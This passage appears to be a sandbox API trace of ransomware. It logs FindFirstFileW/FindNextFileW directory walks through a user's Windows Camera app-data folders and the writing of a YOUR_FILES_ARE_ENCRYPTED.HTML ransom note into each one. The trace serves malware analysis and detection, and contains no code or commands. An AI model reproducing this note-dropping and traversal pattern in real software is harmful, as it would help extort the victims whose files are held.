lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsCamera_8wekyb3d8bbwe\\AC\\INetCache", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsCamera_8wekyb3d8bbwe\\AC\\INetCache\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsCamera_8wekyb3d8bbwe\\AC\\INetCache\\*" [0120.077] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsCamera_8wekyb3d8bbwe\\AC\\INetCache\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x1b0dc0dd, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x1b0dc0dd, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x1b0dc0dd, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6da498, dwReserved1=0x6dace0, cFileName=".", cAlternateFileName="")) returned 0x6266f8 [0120.078] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x1b0dc0dd, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x1b0dc0dd, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x1b0dc0dd, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6da498, dwReserved1=0x6dace0, cFileName="..", cAlternateFileName="")) returned 1 [0120.078] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x1b0dc0dd, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x1b0dc0dd, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x1b0dc0dd, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6da498, dwReserved1=0x6dace0, cFileName="..", cAlternateFileName="")) returned 0 [0120.078] FindClose (in: hFindFile=0x6266f8 | out: hFindFile=0x6266f8) returned 1 [0120.078] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsCamera_8wekyb3d8bbwe\\AC\\INetCache\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 129 [0120.078] GetProcessHeap () returned 0x600000 [0120.078] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3116fe0 [0120.078] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsCamera_8wekyb3d8bbwe\\AC\\INetCache\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.windowscamera_8wekyb3d8bbwe\\ac\\inetcache\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x320 [0120.080] WriteFile (in: hFile=0x320, lpBuffer=0x3116fe0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x3116fe0*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0120.081] CloseHandle (hObject=0x320) returned 1 [0120.081] GetProcessHeap () returned 0x600000 [0120.081] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3116fe0 | out: hHeap=0x600000) returned 1 [0120.081] GetProcessHeap () returned 0x600000 [0120.081] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x313b008 | out: hHeap=0x600000) returned 1 [0120.081] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x1b0dc0dd, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x1b0dc0dd, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x1b0dc0dd, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6dad86, dwReserved1=0x6dacd8, cFileName="INetCookies", cAlternateFileName="INETCO~1")) returned 1 [0120.081] StrStrIW (lpFirst="INetCookies", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0120.081] wnsprintfW (in: pszDest=0x3106fd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsCamera_8wekyb3d8bbwe\\AC\\INetCookies") returned 101 [0120.081] GetProcessHeap () returned 0x600000 [0120.081] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x313b008 [0120.081] lstrcpyW (in: lpString1=0x313b008, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsCamera_8wekyb3d8bbwe\\AC\\INetCookies" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsCamera_8wekyb3d8bbwe\\AC\\INetCookies") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsCamera_8wekyb3d8bbwe\\AC\\INetCookies" [0120.081] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsCamera_8wekyb3d8bbwe\\AC\\INetCookies", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsCamera_8wekyb3d8bbwe\\AC\\INetCookies\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsCamera_8wekyb3d8bbwe\\AC\\INetCookies\\*" [0120.081] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsCamera_8wekyb3d8bbwe\\AC\\INetCookies\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x1b0dc0dd, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x1b0dc0dd, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x1b0dc0dd, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6da498, dwReserved1=0x6dace0, cFileName=".", cAlternateFileName="")) returned 0x6266f8 [0120.082] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x1b0dc0dd, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x1b0dc0dd, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x1b0dc0dd, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6da498, dwReserved1=0x6dace0, cFileName="..", cAlternateFileName="")) returned 1 [0120.082] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x1b0dc0dd, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x1b0dc0dd, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x1b0dc0dd, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6da498, dwReserved1=0x6dace0, cFileName="..", cAlternateFileName="")) returned 0 [0120.082] FindClose (in: hFindFile=0x6266f8 | out: hFindFile=0x6266f8) returned 1 [0120.082] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsCamera_8wekyb3d8bbwe\\AC\\INetCookies\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 131 [0120.082] GetProcessHeap () returned 0x600000 [0120.082] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3116fe0 [0120.082] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsCamera_8wekyb3d8bbwe\\AC\\INetCookies\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.windowscamera_8wekyb3d8bbwe\\ac\\inetcookies\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x320 [0120.083] WriteFile (in: hFile=0x320, lpBuffer=0x3116fe0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x3116fe0*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0120.084] CloseHandle (hObject=0x320) returned 1 [0120.084] GetProcessHeap () returned 0x600000 [0120.084] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3116fe0 | out: hHeap=0x600000) returned 1 [0120.084] GetProcessHeap () returned 0x600000 [0120.084] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x313b008 | out: hHeap=0x600000) returned 1 [0120.084] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x1b0dc0dd, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x1b0dc0dd, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x1b0dc0dd, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6dad86, dwReserved1=0x6dacd8, cFileName="INetHistory", cAlternateFileName="INETHI~1")) returned 1 [0120.084] StrStrIW (lpFirst="INetHistory", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0120.084] wnsprintfW (in: pszDest=0x3106fd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsCamera_8wekyb3d8bbwe\\AC\\INetHistory") returned 101 [0120.084] GetProcessHeap () returned 0x600000 [0120.084] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x313b008 [0120.084] lstrcpyW (in: lpString1=0x313b008, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsCamera_8wekyb3d8bbwe\\AC\\INetHistory" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsCamera_8wekyb3d8bbwe\\AC\\INetHistory") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsCamera_8wekyb3d8bbwe\\AC\\INetHistory" [0120.084] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsCamera_8wekyb3d8bbwe\\AC\\INetHistory", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsCamera_8wekyb3d8bbwe\\AC\\INetHistory\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsCamera_8wekyb3d8bbwe\\AC\\INetHistory\\*" [0120.084] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsCamera_8wekyb3d8bbwe\\AC\\INetHistory\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x1b0dc0dd, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x1b0dc0dd, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x1b0dc0dd, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6da498, dwReserved1=0x6dace0, cFileName=".", cAlternateFileName="")) returned 0x626978 [0120.084] FindNextFileW (in: hFindFile=0x626978, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x1b0dc0dd, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x1b0dc0dd, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x1b0dc0dd, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6da498, dwReserved1=0x6dace0, cFileName="..", cAlternateFileName="")) returned 1 [0120.084] FindNextFileW (in: hFindFile=0x626978, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x1b0dc0dd, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x1b0dc0dd, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x1b0dc0dd, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6da498, dwReserved1=0x6dace0, cFileName="..", cAlternateFileName="")) returned 0 [0120.084] FindClose (in: hFindFile=0x626978 | out: hFindFile=0x626978) returned 1 [0120.084] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsCamera_8wekyb3d8bbwe\\AC\\INetHistory\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 131 [0120.084] GetProcessHeap () returned 0x600000 [0120.084] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3116fe0 [0120.085] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsCamera_8wekyb3d8bbwe\\AC\\INetHistory\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.windowscamera_8wekyb3d8bbwe\\ac\\inethistory\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x320 [0120.085] WriteFile (in: hFile=0x320, lpBuffer=0x3116fe0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x3116fe0*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0120.086] CloseHandle (hObject=0x320) returned 1 [0120.086] GetProcessHeap () returned 0x600000 [0120.086] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3116fe0 | out: hHeap=0x600000) returned 1 [0120.086] GetProcessHeap () returned 0x600000 [0120.086] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x313b008 | out: hHeap=0x600000) returned 1 [0120.086] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1b0dc0dd, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x1b0dc0dd, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x1b0dc0dd, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6dad86, dwReserved1=0x6dacd8, cFileName="Temp", cAlternateFileName="")) returned 1 [0120.086] StrStrIW (lpFirst="Temp", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0120.086] wnsprintfW (in: pszDest=0x3106fd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsCamera_8wekyb3d8bbwe\\AC\\Temp") returned 94 [0120.087] GetProcessHeap () returned 0x600000 [0120.087] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x313b008 [0120.087] lstrcpyW (in: lpString1=0x313b008, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsCamera_8wekyb3d8bbwe\\AC\\Temp" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsCamera_8wekyb3d8bbwe\\AC\\Temp") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsCamera_8wekyb3d8bbwe\\AC\\Temp" [0120.087] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsCamera_8wekyb3d8bbwe\\AC\\Temp", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsCamera_8wekyb3d8bbwe\\AC\\Temp\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsCamera_8wekyb3d8bbwe\\AC\\Temp\\*" [0120.087] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsCamera_8wekyb3d8bbwe\\AC\\Temp\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1b0dc0dd, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x1b0dc0dd, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x1b0dc0dd, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6da498, dwReserved1=0x6dace0, cFileName=".", cAlternateFileName="")) returned 0x6266f8 [0120.087] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1b0dc0dd, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x1b0dc0dd, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x1b0dc0dd, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6da498, dwReserved1=0x6dace0, cFileName="..", cAlternateFileName="")) returned 1 [0120.087] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1b0dc0dd, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x1b0dc0dd, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x1b0dc0dd, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6da498, dwReserved1=0x6dace0, cFileName="..", cAlternateFileName="")) returned 0 [0120.087] FindClose (in: hFindFile=0x6266f8 | out: hFindFile=0x6266f8) returned 1 [0120.087] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsCamera_8wekyb3d8bbwe\\AC\\Temp\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 124 [0120.087] GetProcessHeap () returned 0x600000 [0120.087] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3116fe0 [0120.087] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsCamera_8wekyb3d8bbwe\\AC\\Temp\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.windowscamera_8wekyb3d8bbwe\\ac\\temp\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x320 [0120.088] WriteFile (in: hFile=0x320, lpBuffer=0x3116fe0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x3116fe0*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0120.089] CloseHandle (hObject=0x320) returned 1 [0120.089] GetProcessHeap () returned 0x600000 [0120.089] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3116fe0 | out: hHeap=0x600000) returned 1 [0120.089] GetProcessHeap () returned 0x600000 [0120.089] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x313b008 | out: hHeap=0x600000) returned 1 [0120.091] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1b0dc0dd, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x1b0dc0dd, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x1b0dc0dd, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6dad86, dwReserved1=0x6dacd8, cFileName="Temp", cAlternateFileName="")) returned 0 [0120.091] FindClose (in: hFindFile=0x626638 | out: hFindFile=0x626638) returned 1 [0120.091] wnsprintfW (in: pszDest=0x3106fd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsCamera_8wekyb3d8bbwe\\AC\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 119 [0120.091] GetProcessHeap () returned 0x600000 [0120.091] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3116fe0 [0120.091] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsCamera_8wekyb3d8bbwe\\AC\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.windowscamera_8wekyb3d8bbwe\\ac\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x31c [0120.092] WriteFile (in: hFile=0x31c, lpBuffer=0x3116fe0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x3116fe0*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0120.093] CloseHandle (hObject=0x31c) returned 1 [0120.093] GetProcessHeap () returned 0x600000 [0120.093] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3116fe0 | out: hHeap=0x600000) returned 1 [0120.093] GetProcessHeap () returned 0x600000 [0120.093] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3106fd8 | out: hHeap=0x600000) returned 1 [0120.093] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1b04390b, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x1b04390b, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x1b04390b, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="AppData", cAlternateFileName="")) returned 1 [0120.093] StrStrIW (lpFirst="AppData", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0120.093] wnsprintfW (in: pszDest=0x30f4fc8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsCamera_8wekyb3d8bbwe\\AppData") returned 94 [0120.093] GetProcessHeap () returned 0x600000 [0120.093] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x3106fd8 [0120.093] lstrcpyW (in: lpString1=0x3106fd8, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsCamera_8wekyb3d8bbwe\\AppData" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsCamera_8wekyb3d8bbwe\\AppData") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsCamera_8wekyb3d8bbwe\\AppData" [0120.093] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsCamera_8wekyb3d8bbwe\\AppData", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsCamera_8wekyb3d8bbwe\\AppData\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsCamera_8wekyb3d8bbwe\\AppData\\*" [0120.093] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsCamera_8wekyb3d8bbwe\\AppData\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1b04390b, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x1b04390b, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x1b04390b, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6dad86, dwReserved1=0x6dacd8, cFileName=".", cAlternateFileName="")) returned 0x6267b8 [0120.094] FindNextFileW (in: hFindFile=0x6267b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1b04390b, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x1b04390b, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x1b04390b, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6dad86, dwReserved1=0x6dacd8, cFileName="..", cAlternateFileName="")) returned 1 [0120.094] FindNextFileW (in: hFindFile=0x6267b8, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1b04390b, 